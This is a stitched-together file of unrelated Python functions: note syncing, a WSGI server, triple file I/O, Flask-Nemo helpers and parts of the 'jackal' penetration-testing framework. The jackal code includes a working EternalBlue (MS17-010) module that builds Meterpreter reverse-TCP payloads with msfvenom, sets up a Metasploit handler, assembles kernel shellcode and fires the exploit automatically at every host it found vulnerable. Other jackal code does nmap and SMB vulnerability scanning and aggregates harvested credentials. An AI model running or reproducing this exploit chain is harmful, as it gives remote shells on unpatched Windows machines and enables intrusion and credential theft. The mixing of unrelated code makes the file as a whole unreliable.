ret.body = xdoc.findtext('body')
ret.size = xdoc.findtext('size')
if ret.body is not None:
ret.size = len(ret.body)
elif ret.size is not None:
ret.size = int(ret.size)
# todo: do anything with "parent"?...
# load the date attributes
for attr in ('created', 'modified', 'accessed'):
val = xdoc.findtext(attr)
if val is not None:
setattr(ret, attr, int(common.parse_ts_iso(val)))
# load the boolean attributes
for attr in ('hidden', 'system', 'archived', 'delete',
'writable', 'readable', 'executable'):
val = xdoc.findtext('attributes/' + attr[0])
if val is not None:
setattr(ret, attr, val.lower() == 'true')
return ret |
def setup(self):
"""
This function will call msfvenom, nasm and git via subprocess to setup all the things.
Returns True if everything went well, otherwise returns False.
"""
lport64 = self.port64
lport32 = self.port32
print_notification("Using ip: {}".format(self.ip))
print_notification("Generating metasploit resource file")
resource = """use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port64}
set ExitOnSession false
run -j
set payload windows/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port32}
set ExitOnSession false
run -j
""".format(ip=self.ip, port64=lport64, port32=lport32)
self.resource_file = os.path.join(self.datadir, 'ms17_resource.rc')
with open(self.resource_file, 'w') as f:
f.write(resource)
print_success("Resource file created, run the following command in msfconsole:")
print_success("resource {}".format(self.resource_file))
command_64 = "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload32.bin".format(ip=self.ip, port=lport32, datadir=self.datadir)
command_32 = "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload64.bin".format(ip=self.ip, port=lport64, datadir=self.datadir)
print_notification("Generating payloads")
process = subprocess.run(command_32.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if process.returncode != 0:
print_error("Problem with generating payload:")
print_error(process.stderr)
return False
process = subprocess.run(command_64.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if process.returncode != 0:
print_error("Problem with generating payload:")
print_error(process.stderr)
return False
if not os.path.exists(os.path.join(self.datadir, 'MS17-010')):
print_notification("Git repo was not found, cloning")
process = subprocess.run("git clone https://github.com/mwgielen/MS17-010 {dir}".format(dir=os.path.join(self.datadir, 'MS17-010')).split(' '))
if process.returncode != 0:
print_error("Problems with cloning git")
return False
process = subprocess.run("nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o {datadir}/kshell64.bin".format(datadir=self.datadir).split(' '))
if process.returncode != 0:
print_error("Problems with NASM")
return False
process = subprocess.run("nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o {datadir}/kshell86.bin".format(datadir=self.datadir).split(' '))
if process.returncode != 0:
print_error("Problems with NASM")
return False
self.combine_files('kshell64.bin', 'payload64.bin', 'final_met_64.bin')
self.combine_files('kshell86.bin', 'payload32.bin', 'final_met_32.bin')
self.create_payload('final_met_32.bin', 'final_met_64.bin', 'final_combined.bin')
print_notification("Combining payloads done")
print_success("Setup Done")
return True |
def create_payload(self, x86_file, x64_file, payload_file):
"""
Creates the final payload based on the x86 and x64 meterpreters.
"""
sc_x86 = open(os.path.join(self.datadir, x86_file), 'rb').read()
sc_x64 = open(os.path.join(self.datadir, x64_file), 'rb').read()
fp = open(os.path.join(self.datadir, payload_file), 'wb')
fp.write(b'\x31\xc0\x40\x0f\x84' + pack('<I', len(sc_x86)))
fp.write(sc_x86)
fp.write(sc_x64)
fp.close() |
def combine_files(self, f1, f2, f3):
"""
Combines the files 1 and 2 into 3.
"""
with open(os.path.join(self.datadir, f3), 'wb') as new_file:
with open(os.path.join(self.datadir, f1), 'rb') as file_1:
new_file.write(file_1.read())
with open(os.path.join(self.datadir, f2), 'rb') as file_2:
new_file.write(file_2.read()) |
def detect_os(self, ip):
"""
Runs the checker.py scripts to detect the os.
"""
process = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'checker.py'), str(ip)], stdout=subprocess.PIPE)
out = process.stdout.decode('utf-8').split('\n')
system_os = ''
for line in out:
if line.startswith('Target OS:'):
system_os = line.replace('Target OS: ', '')
break
return system_os |
def exploit(self):
"""
Starts the exploiting phase, you should run setup before running this function.
if auto is set, this function will fire the exploit to all systems. Otherwise a curses interface is shown.
"""
search = ServiceSearch()
host_search = HostSearch()
services = search.get_services(tags=['MS17-010'])
services = [service for service in services]
if len(services) == 0:
print_error("No services found that are vulnerable for MS17-010")
return
if self.auto:
print_success("Found {} services vulnerable for MS17-010".format(len(services)))
for service in services:
print_success("Exploiting " + str(service.address))
host = host_search.id_to_object(str(service.address))
system_os = ''
if host.os:
system_os = host.os
else:
system_os = self.detect_os(str(service.address))
host.os = system_os
host.save()
text = self.exploit_single(str(service.address), system_os)
print_notification(text)
else:
service_list = []
for service in services:
host = host_search.id_to_object(str(service.address))
system_os = ''
if host.os:
system_os = host.os
else:
system_os = self.detect_os(str(service.address))
host.os = system_os
host.save()
service_list.append({'ip': service.address, 'os': system_os, 'string': "{ip} ({os}) {hostname}".format(ip=service.address, os=system_os, hostname=host.hostname)})
draw_interface(service_list, self.callback, "Exploiting {ip} with OS: {os}") |
def exploit_single(self, ip, operating_system):
"""
Exploits a single ip, exploit is based on the given operating system.
"""
result = None
if "Windows Server 2008" in operating_system or "Windows 7" in operating_system:
result = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'eternalblue_exploit7.py'), str(ip), os.path.join(self.datadir, 'final_combined.bin'), "12"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
elif "Windows Server 2012" in operating_system or "Windows 10" in operating_system or "Windows 8.1" in operating_system:
result = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'eternalblue_exploit8.py'), str(ip), os.path.join(self.datadir, 'final_combined.bin'), "12"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
return ["System target could not be automatically identified"]
return result.stdout.decode('utf-8').split('\n') |
def epoll_poller(timeout=0.0, map=None):
"""
A poller which uses epoll(), supported on Linux 2.5.44 and newer
Borrowed from here:
https://github.com/m13253/python-asyncore-epoll/blob/master/asyncore_epoll.py#L200
"""
if map is None:
map = asyncore.socket_map
pollster = select.epoll()
if map:
for fd, obj in iteritems(map):
flags = 0
if obj.readable():
flags |= select.POLLIN | select.POLLPRI
if obj.writable():
flags |= select.POLLOUT
if flags:
# Only check for exceptions if object was either readable
# or writable.
flags |= select.POLLERR | select.POLLHUP | select.POLLNVAL
pollster.register(fd, flags)
try:
r = pollster.poll(timeout)
except select.error as err:
if err.args[0] != EINTR:
raise
r = []
for fd, flags in r:
obj = map.get(fd)
if obj is None:
continue
asyncore.readwrite(obj, flags) |
def get_poll_func():
"""Get the best available socket poll function
:return: poller function
"""
if hasattr(select, 'epoll'):
poll_func = epoll_poller
elif hasattr(select, 'poll'):
poll_func = asyncore.poll2
else:
poll_func = asyncore.poll
return poll_func |
def make_server(host, port, app=None,
server_class=AsyncWsgiServer,
handler_class=AsyncWsgiHandler,
ws_handler_class=None,
ws_path='/ws'):
"""Create server instance with an optional WebSocket handler
For pure WebSocket server ``app`` may be ``None`` but an attempt to access
any path other than ``ws_path`` will cause server error.
:param host: hostname or IP
:type host: str
:param port: server port
:type port: int
:param app: WSGI application
:param server_class: WSGI server class, defaults to AsyncWsgiServer
:param handler_class: WSGI handler class, defaults to AsyncWsgiHandler
:param ws_handler_class: WebSocket hanlder class, defaults to ``None``
:param ws_path: WebSocket path on the server, defaults to '/ws'
:type ws_path: str, optional
:return: initialized server instance
"""
handler_class.ws_handler_class = ws_handler_class
handler_class.ws_path = ws_path
httpd = server_class((host, port), RequestHandlerClass=handler_class)
httpd.set_app(app)
return httpd |
def poll_once(self, timeout=0.0):
"""
Poll active sockets once
This method can be used to allow aborting server polling loop
on some condition.
:param timeout: polling timeout
"""
if self._map:
self._poll_func(timeout, self._map) |
def serve_forever(self, poll_interval=0.5):
"""
Start serving HTTP requests
This method blocks the current thread.
:param poll_interval: polling timeout
:return:
"""
logger.info('Starting server on {}:{}...'.format(
self.server_name, self.server_port)
)
while True:
try:
self.poll_once(poll_interval)
except (KeyboardInterrupt, SystemExit):
break
self.handle_close()
logger.info('Server stopped.') |
def read_labels(filename, delimiter=DEFAULT_DELIMITER):
"""read label files. Format: ent label"""
_assert_good_file(filename)
with open(filename) as f:
labels = [_label_processing(l, delimiter) for l in f]
return labels |
def write_index_translation(translation_filename, entity_ids, relation_ids):
"""write triples into a translation file."""
translation = triple_pb.Translation()
entities = []
for name, index in entity_ids.items():
translation.entities.add(element=name, index=index)
relations = []
for name, index in relation_ids.items():
translation.relations.add(element=name, index=index)
with open(translation_filename, "wb") as f:
f.write(translation.SerializeToString()) |
def write_triples(filename, triples, delimiter=DEFAULT_DELIMITER, triple_order="hrt"):
"""write triples to file."""
with open(filename, 'w') as f:
for t in triples:
line = t.serialize(delimiter, triple_order)
f.write(line + "\n") |
def read_translation(filename):
"""Returns protobuf mapcontainer. Read from translation file."""
translation = triple_pb.Translation()
with open(filename, "rb") as f:
translation.ParseFromString(f.read())
def unwrap_translation_units(units):
for u in units: yield u.element, u.index
return (list(unwrap_translation_units(translation.entities)),
list(unwrap_translation_units(translation.relations))) |
def read_openke_translation(filename, delimiter='\t', entity_first=True):
"""Returns map with entity or relations from plain text."""
result = {}
with open(filename, "r") as f:
_ = next(f) # pass the total entry number
for line in f:
line_slice = line.rstrip().split(delimiter)
if not entity_first:
line_slice = list(reversed(line_slice))
result[line_slice[0]] = line_slice[1]
return result |
def overview():
"""
Prints an overview of the tags of the hosts.
"""
doc = Host()
search = doc.search()
search.aggs.bucket('tag_count', 'terms', field='tags', order={'_count': 'desc'}, size=100)
response = search.execute()
print_line("{0:<25} {1}".format('Tag', 'Count'))
print_line("-" * 30)
for entry in response.aggregations.tag_count.buckets:
print_line("{0:<25} {1}".format(entry.key, entry.doc_count)) |
def main():
"""
Main credentials tool
"""
cred_search = CredentialSearch()
arg = argparse.ArgumentParser(parents=[cred_search.argparser], conflict_handler='resolve')
arg.add_argument('-c', '--count', help="Only show the number of results", action="store_true")
arguments = arg.parse_args()
if arguments.count:
print_line("Number of credentials: {}".format(cred_search.argument_count()))
else:
response = cred_search.get_credentials()
for hit in response:
print_json(hit.to_dict(include_meta=True)) |
def overview():
"""
Provides an overview of the duplicate credentials.
"""
search = Credential.search()
search.aggs.bucket('password_count', 'terms', field='secret', order={'_count': 'desc'}, size=20)\
.metric('username_count', 'cardinality', field='username') \
.metric('host_count', 'cardinality', field='host_ip') \
.metric('top_hits', 'top_hits', docvalue_fields=['username'], size=100)
response = search.execute()
print_line("{0:65} {1:5} {2:5} {3:5} {4}".format("Secret", "Count", "Hosts", "Users", "Usernames"))
print_line("-"*100)
for entry in response.aggregations.password_count.buckets:
usernames = []
for creds in entry.top_hits:
usernames.append(creds.username[0])
usernames = list(set(usernames))
print_line("{0:65} {1:5} {2:5} {3:5} {4}".format(entry.key, entry.doc_count, entry.host_count.value, entry.username_count.value, usernames)) |
def process(self, nemo):
""" Register nemo and parses annotations
.. note:: Process parses the annotation and extends informations about the target URNs by retrieving resource in range
:param nemo: Nemo
"""
self.__nemo__ = nemo
for annotation in self.__annotations__:
annotation.target.expanded = frozenset(
self.__getinnerreffs__(
objectId=annotation.target.objectId,
subreference=annotation.target.subreference
)
) |
def pipe_worker(pipename, filename, object_type, query, format_string, unique=False):
"""
Starts the loop to provide the data from jackal.
"""
print_notification("[{}] Starting pipe".format(pipename))
object_type = object_type()
try:
while True:
uniq = set()
# Remove the previous file if it exists
if os.path.exists(filename):
os.remove(filename)
# Create the named pipe
os.mkfifo(filename)
# This function will block until a process opens it
with open(filename, 'w') as pipe:
print_success("[{}] Providing data".format(pipename))
# Search the database
objects = object_type.search(**query)
for obj in objects:
data = fmt.format(format_string, **obj.to_dict())
if unique:
if not data in uniq:
uniq.add(data)
pipe.write(data + '\n')
else:
pipe.write(data + '\n')
os.unlink(filename)
except KeyboardInterrupt:
print_notification("[{}] Shutting down named pipe".format(pipename))
except Exception as e:
print_error("[{}] Error: {}, stopping named pipe".format(e, pipename))
finally:
os.remove(filename) |
def create_query(section):
"""
Creates a search query based on the section of the config file.
"""
query = {}
if 'ports' in section:
query['ports'] = [section['ports']]
if 'up' in section:
query['up'] = bool(section['up'])
if 'search' in section:
query['search'] = [section['search']]
if 'tags' in section:
query['tags'] = [section['tags']]
if 'groups' in section:
query['groups'] = [section['groups']]
return query |
def create_pipe_workers(configfile, directory):
"""
Creates the workers based on the given configfile to provide named pipes in the directory.
"""
type_map = {'service': ServiceSearch,
'host': HostSearch, 'range': RangeSearch,
'user': UserSearch}
config = configparser.ConfigParser()
config.read(configfile)
if not len(config.sections()):
print_error("No named pipes configured")
return
print_notification("Starting {} pipes in directory {}".format(
len(config.sections()), directory))
workers = []
for name in config.sections():
section = config[name]
query = create_query(section)
object_type = type_map[section['type']]
args = (name, os.path.join(directory, name), object_type, query,
section['format'], bool(section.get('unique', 0)))
workers.append(multiprocessing.Process(target=pipe_worker, args=args))
return workers |
def main():
"""
Loads the config and handles the workers.
"""
config = Config()
pipes_dir = config.get('pipes', 'directory')
pipes_config = config.get('pipes', 'config_file')
pipes_config_path = os.path.join(config.config_dir, pipes_config)
if not os.path.exists(pipes_config_path):
print_error("Please configure the named pipes first")
return
workers = create_pipe_workers(pipes_config_path, pipes_dir)
if workers:
for worker in workers:
worker.start()
try:
for worker in workers:
worker.join()
except KeyboardInterrupt:
print_notification("Shutting down")
for worker in workers:
worker.terminate()
worker.join() |
def f_i18n_iso(isocode, lang="eng"):
""" Replace isocode by its language equivalent
:param isocode: Three character long language code
:param lang: Lang in which to return the language name
:return: Full Text Language Name
"""
if lang not in flask_nemo._data.AVAILABLE_TRANSLATIONS:
lang = "eng"
try:
return flask_nemo._data.ISOCODES[isocode][lang]
except KeyError:
return "Unknown" |
def f_hierarchical_passages(reffs, citation):
""" A function to construct a hierarchical dictionary representing the different citation layers of a text
:param reffs: passage references with human-readable equivalent
:type reffs: [(str, str)]
:param citation: Main Citation
:type citation: Citation
:return: nested dictionary representing where keys represent the names of the levels and the final values represent the passage reference
:rtype: OrderedDict
"""
d = OrderedDict()
levels = [x for x in citation]
for cit, name in reffs:
ref = cit.split('-')[0]
levs = ['%{}|{}%'.format(levels[i].name, v) for i, v in enumerate(ref.split('.'))]
getFromDict(d, levs[:-1])[name] = cit
return d |
def f_i18n_citation_type(string, lang="eng"):
""" Take a string of form %citation_type|passage% and format it for human
:param string: String of formation %citation_type|passage%
:param lang: Language to translate to
:return: Human Readable string
.. note :: To Do : Use i18n tools and provide real i18n
"""
s = " ".join(string.strip("%").split("|"))
return s.capitalize() |
def f_annotation_filter(annotations, type_uri, number):
""" Annotation filtering filter
:param annotations: List of annotations
:type annotations: [AnnotationResource]
:param type_uri: URI Type on which to filter
:type type_uri: str
:param number: Number of the annotation to return
:type number: int
:return: Annotation(s) matching the request
:rtype: [AnnotationResource] or AnnotationResource
"""
filtered = [
annotation
for annotation in annotations
if annotation.type_uri == type_uri
]
number = min([len(filtered), number])
if number == 0:
return None
else:
return filtered[number-1] |
def scan(self, store):
'''
Scans the local files for changes (either additions, modifications or
deletions) and reports them to the `store` object, which is expected to
implement the :class:`pysyncml.Store` interface.
'''
# steps:
# 1) generate a table of all store files, with filename,
# inode, checksum
# 2) generate a table of all current files, with filename,
# inode, checksum
# 3) iterate over all stored values and find matches, delete
# them from the "not-matched-yet" table, and record the
# change
# TODO: if this engine is running as the client, i think the best
# strategy is to delete all pending changes before starting
# the scan process. that way, any left-over gunk from a
# previous sync that did not terminate well is cleaned up...
# TODO: this algorithm, although better than the last, has the
# inconvenient downside of being very memory-hungry: it
# assumes that the entire list of notes (with sha256
# checksums - not the entire body) fits in memory. although
# it is not a ridiculous assumption (these are "notes" after
# all...), it would be nice if it did not rely on that.
# todo: by tracking inode's, this *could* also potentially reduce
# some "del/add" operations with a single "mod"
# todo: should this make use of lastmod timestamps?... that may
# help to reduce the number of checksums calculated and the
# number of entries loaded into memory...
if self.ignoreRoot is None:
self.ignoreRoot = re.compile('^(%s)$' % (re.escape(self.engine.syncSubdir),))
dbnotes = list(self.engine.model.NoteItem.q())
dbnames = dict((e.name, e) for e in dbnotes)
fsnotes = list(self._scandir('.'))
fsnames = dict((e.name, e) for e in fsnotes)
# first pass: eliminate all entries with matching filenames & checksum
for fsent in fsnames.values():
if fsent.name in dbnames and dbnames[fsent.name].sha256 == fsent.sha256:
log.debug('entry "%s" not modified', fsent.name)
# todo: update db inode and lastmod if needed...
del dbnames[fsent.name]
del fsnames[fsent.name]
# second pass: find entries that were moved to override another entry
dbskip = []
for dbent in dbnames.values():
if dbent.id in dbskip or dbent.name in fsnames:
continue
for fsent in fsnames.values():
if fsent.sha256 != dbent.sha256 or fsent.name not in dbnames:
continue
log.debug('entry "%s" deleted and replaced by "%s"', fsent.name, dbent.name)
dbother = dbnames[fsent.name]
del dbnames[dbent.name]
del dbnames[fsent.name]
del fsnames[fsent.name]
dbskip.append(dbother.id)
store.registerChange(dbent.id, pysyncml.ITEM_DELETED)
for key, val in fsent.items():
setattr(dbother, key, val)
# the digest didn't change, so this is just a filename change...
if self.engine.options.syncFilename:
store.registerChange(dbother.id, pysyncml.ITEM_MODIFIED)
break
# third pass: find entries that were renamed
dbskip = []
for dbent in dbnames.values():
if dbent.id in dbskip:
continue
for fsent in fsnames.values():
if fsent.sha256 != dbent.sha256:
continue
log.debug('entry "%s" renamed to "%s"', dbent.name, fsent.name)
del dbnames[dbent.name]
del fsnames[fsent.name]
for key, val in fsent.items():
setattr(dbent, key, val)
# the digest didn't change, so this is just a filename change...
if self.engine.options.syncFilename:
store.registerChange(dbent.id, pysyncml.ITEM_MODIFIED)
break
# fourth pass: find new and modified entries
for fsent in fsnames.values():
if fsent.name in dbnames:
log.debug('entry "%s" modified', fsent.name)
dbent = dbnames[fsent.name]
del dbnames[fsent.name]
store.registerChange(dbent.id, pysyncml.ITEM_MODIFIED)
else:
log.debug('entry "%s" added', fsent.name)
dbent = self.engine.model.NoteItem()
self.engine.dbsession.add(dbent)
store.registerChange(dbent.id, pysyncml.ITEM_ADDED)
for key, val in fsent.items():
setattr(dbent, key, val)
del fsnames[fsent.name]
# fifth pass: find deleted entries
for dbent in dbnames.values():
store.registerChange(dbent.id, pysyncml.ITEM_DELETED)
self.engine.dbsession.add(dbent) |
def check_service(service):
"""
Connect to a service to see if it is a http or https server.
"""
# Try HTTP
service.add_tag('header_scan')
http = False
try:
result = requests.head('http://{}:{}'.format(service.address, service.port), timeout=1)
print_success("Found http service on {}:{}".format(service.address, service.port))
service.add_tag('http')
http = True
try:
service.banner = result.headers['Server']
except KeyError:
pass
except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
pass
if not http:
# Try HTTPS
try:
result = requests.head('https://{}:{}'.format(service.address, service.port), verify=False, timeout=3)
service.add_tag('https')
print_success("Found https service on {}:{}".format(service.address, service.port))
try:
service.banner = result.headers['Server']
except KeyError:
pass
except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
pass
service.save() |
def main():
"""
Retrieves services starts check_service in a gevent pool of 100.
"""
search = ServiceSearch()
services = search.get_services(up=True, tags=['!header_scan'])
print_notification("Scanning {} services".format(len(services)))
# Disable the insecure request warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
pool = Pool(100)
count = 0
for service in services:
count += 1
if count % 50 == 0:
print_notification("Checking {}/{} services".format(count, len(services)))
pool.spawn(check_service, service)
pool.join()
print_notification("Completed, 'http' tag added to services that respond to http, 'https' tag added to services that respond to https.") |
def import_nmap(result, tag, check_function=all_hosts, import_services=False):
"""
Imports the given nmap result.
"""
host_search = HostSearch(arguments=False)
service_search = ServiceSearch()
parser = NmapParser()
report = parser.parse_fromstring(result)
imported_hosts = 0
imported_services = 0
for nmap_host in report.hosts:
if check_function(nmap_host):
imported_hosts += 1
host = host_search.id_to_object(nmap_host.address)
host.status = nmap_host.status
host.add_tag(tag)
if nmap_host.os_fingerprinted:
host.os = nmap_host.os_fingerprint
if nmap_host.hostnames:
host.hostname.extend(nmap_host.hostnames)
if import_services:
for service in nmap_host.services:
imported_services += 1
serv = Service(**service.get_dict())
serv.address = nmap_host.address
service_id = service_search.object_to_id(serv)
if service_id:
# Existing object, save the banner and script results.
serv_old = Service.get(service_id)
if service.banner:
serv_old.banner = service.banner
# TODO implement
# if service.script_results:
# serv_old.script_results.extend(service.script_results)
serv_old.save()
else:
# New object
serv.address = nmap_host.address
serv.save()
if service.state == 'open':
host.open_ports.append(service.port)
if service.state == 'closed':
host.closed_ports.append(service.port)
if service.state == 'filtered':
host.filtered_ports.append(service.port)
host.save()
if imported_hosts:
print_success("Imported {} hosts, with tag {}".format(imported_hosts, tag))
else:
print_error("No hosts found")
return {'hosts': imported_hosts, 'services': imported_services} |
def nmap(nmap_args, ips):
"""
Start an nmap process with the given args on the given ips.
"""
config = Config()
arguments = ['nmap', '-Pn']
arguments.extend(ips)
arguments.extend(nmap_args)
output_file = ''
now = datetime.datetime.now()
if not '-oA' in nmap_args:
output_name = 'nmap_jackal_{}'.format(now.strftime("%Y-%m-%d %H:%M"))
path_name = os.path.join(config.get('nmap', 'directory'), output_name)
print_notification("Writing output of nmap to {}".format(path_name))
if not os.path.exists(config.get('nmap', 'directory')):
os.makedirs(config.get('nmap', 'directory'))
output_file = path_name + '.xml'
arguments.extend(['-oA', path_name])
else:
output_file = nmap_args[nmap_args.index('-oA') + 1] + '.xml'
print_notification("Starting nmap")
subprocess.call(arguments)
with open(output_file, 'r') as f:
return f.read() |
def nmap_discover():
"""
This function retrieves ranges from jackal
Uses two functions of nmap to find hosts:
ping: icmp / arp pinging of targets
lookup: reverse dns lookup
"""
rs = RangeSearch()
rs_parser = rs.argparser
arg = argparse.ArgumentParser(parents=[rs_parser], conflict_handler='resolve')
arg.add_argument('type', metavar='type', \
help='The type of nmap scan to do, choose from ping or lookup', \
type=str, choices=['ping', 'lookup'])
arguments, nmap_args = arg.parse_known_args()
tag = None
if arguments.type == 'ping':
tag = 'nmap_ping'
nmap_args.append('-sn')
nmap_args.append('-n')
check_function = include_up_hosts
elif arguments.type == 'lookup':
tag = 'nmap_lookup'
nmap_args.append('-sL')
check_function = include_hostnames
ranges = rs.get_ranges(tags=['!{}'.format(tag)])
ranges = [r for r in ranges]
ips = []
for r in ranges:
ips.append(r.range)
print_notification("Running nmap with args: {} on {} range(s)".format(nmap_args, len(ips)))
result = nmap(nmap_args, ips)
stats = import_nmap(result, tag, check_function)
stats['scanned_ranges'] = len(ips)
Logger().log('nmap_discover', "Nmap discover with args: {} on {} range(s)".format(nmap_args, len(ips)), stats)
for r in ranges:
r.add_tag(tag)
r.save() |
def nmap_scan():
"""
Scans the given hosts with nmap.
"""
# Create the search and config objects
hs = HostSearch()
config = Config()
# Static options to be able to figure out what options to use depending on the input the user gives.
nmap_types = ['top10', 'top100', 'custom', 'top1000', 'all']
options = {'top10':'--top-ports 10', 'top100':'--top-ports 100', 'custom': config.get('nmap', 'options'), 'top1000': '--top-ports 1000', 'all': '-p-'}
# Create an argument parser
hs_parser = hs.argparser
argparser = argparse.ArgumentParser(parents=[hs_parser], conflict_handler='resolve', \
description="Scans hosts from the database using nmap, any arguments that are not in the help are passed to nmap")
argparser.add_argument('type', metavar='type', \
help='The number of ports to scan: top10, top100, custom, top1000 (default) or all', \
type=str, choices=nmap_types, default='top1000', const='top1000', nargs='?')
arguments, extra_nmap_args = argparser.parse_known_args()
# Fix the tags for the search
tags = nmap_types[nmap_types.index(arguments.type):]
tags = ["!nmap_" + tag for tag in tags]
hosts = hs.get_hosts(tags=tags)
hosts = [host for host in hosts]
# Create the nmap arguments
nmap_args = []
nmap_args.extend(extra_nmap_args)
nmap_args.extend(options[arguments.type].split(' '))
# Run nmap
print_notification("Running nmap with args: {} on {} hosts(s)".format(nmap_args, len(hosts)))
if len(hosts):
result = nmap(nmap_args, [str(h.address) for h in hosts])
# Import the nmap result
for host in hosts:
host.add_tag("nmap_{}".format(arguments.type))
host.save()
print_notification("Nmap done, importing results")
stats = import_nmap(result, "nmap_{}".format(arguments.type), check_function=all_hosts, import_services=True)
stats['scanned_hosts'] = len(hosts)
stats['type'] = arguments.type
Logger().log('nmap_scan', "Performed nmap {} scan on {} hosts".format(arguments.type, len(hosts)), stats)
else:
print_notification("No hosts found") |
def nmap_smb_vulnscan():
"""
Scans available smb services in the database for smb signing and ms17-010.
"""
service_search = ServiceSearch()
services = service_search.get_services(ports=['445'], tags=['!smb_vulnscan'], up=True)
services = [service for service in services]
service_dict = {}
for service in services:
service.add_tag('smb_vulnscan')
service_dict[str(service.address)] = service
nmap_args = "-Pn -n --disable-arp-ping --script smb-security-mode.nse,smb-vuln-ms17-010.nse -p 445".split(" ")
if services:
result = nmap(nmap_args, [str(s.address) for s in services])
parser = NmapParser()
report = parser.parse_fromstring(result)
smb_signing = 0
ms17 = 0
for nmap_host in report.hosts:
for script_result in nmap_host.scripts_results:
script_result = script_result.get('elements', {})
service = service_dict[str(nmap_host.address)]
if script_result.get('message_signing', '') == 'disabled':
print_success("({}) SMB Signing disabled".format(nmap_host.address))
service.add_tag('smb_signing_disabled')
smb_signing += 1
if script_result.get('CVE-2017-0143', {}).get('state', '') == 'VULNERABLE':
print_success("({}) Vulnerable for MS17-010".format(nmap_host.address))
service.add_tag('MS17-010')
ms17 += 1
service.update(tags=service.tags)
print_notification("Completed, 'smb_signing_disabled' tag added to systems with smb signing disabled, 'MS17-010' tag added to systems that did not apply MS17-010.")
stats = {'smb_signing': smb_signing, 'MS17_010': ms17, 'scanned_services': len(services)}
Logger().log('smb_vulnscan', 'Scanned {} smb services for vulnerabilities'.format(len(services)), stats)
else:
print_notification("No services found to scan.") |
def os_discovery():
"""
Performs os (and domain) discovery of smb hosts.
"""
hs = HostSearch()
hosts = hs.get_hosts(ports=[445], tags=['!nmap_os'])
# TODO fix filter for emtpy fields.
hosts = [host for host in hosts if not host.os]
host_dict = {}
for host in hosts:
host_dict[str(host.address)] = host
arguments = "--script smb-os-discovery.nse -p 445 -Pn -n --disable-arp-ping".split(' ')
if len(hosts):
count = 0
print_notification("Checking OS of {} systems".format(len(hosts)))
result = nmap(arguments, [str(h.address) for h in hosts])
parser = NmapParser()
report = parser.parse_fromstring(result)
for nmap_host in report.hosts:
for script_result in nmap_host.scripts_results:
script_result = script_result.get('elements', {})
host = host_dict[str(nmap_host.address)]
if 'fqdn' in script_result:
host.hostname.append(script_result['fqdn'])
if 'os' in script_result:
count += 1
host.os = script_result['os']
host_dict[str(nmap_host.address)] = host
for host in hosts:
host.add_tag('nmap_os')
host.save()
print_notification("Done, found the os of {} systems".format(count))
else:
print_notification("No systems found to be checked.") |
def overview():
"""
Function to create an overview of the services.
Will print a list of ports found an the number of times the port was seen.
"""
search = Service.search()
search = search.filter("term", state='open')
search.aggs.bucket('port_count', 'terms', field='port', order={'_count': 'desc'}, size=100) \
.metric('unique_count', 'cardinality', field='address')
response = search.execute()
print_line("Port Count")
print_line("---------------")
for entry in response.aggregations.port_count.buckets:
print_line("{0:<7} {1}".format(entry.key, entry.unique_count.value)) |
def _plugin_endpoint_rename(fn_name, instance):
""" Rename endpoint function name to avoid conflict when namespacing is set to true
:param fn_name: Name of the route function
:param instance: Instance bound to the function
:return: Name of the new namespaced function name
"""
if instance and instance.namespaced:
fn_name = "r_{0}_{1}".format(instance.name, fn_name[2:])
return fn_name |
def get_locale(self):
""" Retrieve the best matching locale using request headers
.. note:: Probably one of the thing to enhance quickly.
:rtype: str
"""
best_match = request.accept_languages.best_match(['de', 'fr', 'en', 'la'])
if best_match is None:
if len(request.accept_languages) > 0:
best_match = request.accept_languages[0][0][:2]
else:
return self.__default_lang__
lang = self.__default_lang__
if best_match == "de":
lang = "ger"
elif best_match == "fr":
lang = "fre"
elif best_match == "en":
lang = "eng"
elif best_match == "la":
lang = "lat"
return lang |
def transform(self, work, xml, objectId, subreference=None):
""" Transform input according to potentially registered XSLT
.. note:: Since 1.0.0, transform takes an objectId parameter which represent the passage which is called
.. note:: Due to XSLT not being able to be used twice, we rexsltise the xml at every call of xslt
.. warning:: Until a C libxslt error is fixed ( https://bugzilla.gnome.org/show_bug.cgi?id=620102 ), \
it is not possible to use strip tags in the xslt given to this application
:param work: Work object containing metadata about the xml
:type work: MyCapytains.resources.inventory.Text
:param xml: XML to transform
:type xml: etree._Element
:param objectId: Object Identifier
:type objectId: str
:param subreference: Subreference
:type subreference: str
:return: String representation of transformed resource
:rtype: str
"""
# We check first that we don't have
if str(objectId) in self._transform:
func = self._transform[str(objectId)]
else:
func = self._transform["default"]
# If we have a string, it means we get a XSL filepath
if isinstance(func, str):
with open(func) as f:
xslt = etree.XSLT(etree.parse(f))
return etree.tostring(
xslt(xml),
encoding=str, method="html",
xml_declaration=None, pretty_print=False, with_tail=True, standalone=None
)
# If we have a function, it means we return the result of the function
elif isinstance(func, Callable):
return func(work, xml, objectId, subreference)
# If we have None, it means we just give back the xml
elif func is None:
return etree.tostring(xml, encoding=str) |
def get_inventory(self):
""" Request the api endpoint to retrieve information about the inventory
:return: Main Collection
:rtype: Collection
"""
if self._inventory is not None:
return self._inventory
self._inventory = self.resolver.getMetadata()
return self._inventory |
def get_reffs(self, objectId, subreference=None, collection=None, export_collection=False):
""" Retrieve and transform a list of references.
Returns the inventory collection object with its metadata and a callback function taking a level parameter \
and returning a list of strings.
:param objectId: Collection Identifier
:type objectId: str
:param subreference: Subreference from which to retrieve children
:type subreference: str
:param collection: Collection object bearing metadata
:type collection: Collection
:param export_collection: Return collection metadata
:type export_collection: bool
:return: Returns either the list of references, or the text collection object with its references as tuple
:rtype: (Collection, [str]) or [str]
"""
if collection is not None:
text = collection
else:
